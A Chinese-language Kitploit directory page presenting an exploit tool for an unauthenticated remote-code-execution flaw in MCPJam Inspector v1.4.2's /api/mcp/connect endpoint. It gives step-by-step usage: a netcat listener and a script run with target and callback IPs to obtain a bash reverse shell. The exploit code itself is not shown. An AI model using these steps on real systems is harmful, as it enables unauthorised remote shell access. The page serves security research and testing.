Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-23744-RCE — 此工具是在涉及 MCPJam v1.4.2 的研究期间创建的。该应用程序暴露了一个API端点,该端点接受服务器配置对象。在某些条件下,验证不足可能导致意外的命令执行。 | Kitploit
工具/GitHubGitHub/alisster00/cve-2026-23744-rce
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具
GitHubalisster00/cve-2026-23744-rce

CVE-2026-23744-RCE

此工具是在涉及 MCPJam v1.4.2 的研究期间创建的。该应用程序暴露了一个API端点,该端点接受服务器配置对象。在某些条件下,验证不足可能导致意外的命令执行。

查看仓库
12个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

MCPJam Inspector v1.4.2 - RCE 漏洞利用

漏洞描述

MCPJam Inspector 在 /api/mcp/connect 端点存在一个未经验证的远程代码执行(RCE)漏洞。攻击者可以通过发送恶意的 MCP 服务器配置载荷来执行任意命令。

该端点接受一个包含 serverConfig 对象的 JSON 载荷,其中包含 command 和 args 数组,这些内容会在系统上直接执行,未经过适当的验证或清理。

受影响版本

  • MCPJam Inspector v1.4.2 以及可能更早的版本

使用方法

先决条件

  • Python 3.6+
  • requests 库:pip install requests
  • netcat 或 socat 用于监听器

快速开始

终端 1 - 启动监听器:

root@kitploit:~
nc -lvnp 4444

终端 2 - 运行漏洞利用脚本:

root@kitploit:~
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 4444

示例

root@kitploit:~
# 默认(端口 6274,回调端口 4444)
python3 script.py <TARGET_IP> -l <YOUR_IP>

# 自定义 MCPJam 端口
python3 script.py <TARGET_IP> -p 6274 -l <YOUR_IP>

# 自定义监听器端口
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 5555

工作原理

  1. 脚本验证目标上的 MCPJam 可访问
  2. 构造一个包含 bash 反弹 shell 的恶意 MCP 服务器载荷
  3. 将载荷发送到 /api/mcp/connect 端点
  4. MCPJam 处理该命令并发起反弹 shell 回调
  5. 用户在监听器上获得交互式 shell

免责声明

⚠️ 免责声明:

此漏洞利用脚本仅供教育和授权的安全测试用途。未经授权访问计算机系统是违法的。用户需自行承担以下责任:

  • 在测试任何系统前获得适当的授权
  • 遵守所有适用的法律法规
  • 因滥用导致的任何损害或法律后果

作者不对因使用此工具导致的滥用或损害承担任何责任。使用风险自负。

技术细节

  • 受影响端点: /api/mcp/connect
  • 方法: POST
  • 认证: 无需认证
  • 影响: 未经授权的远程代码执行
下载工具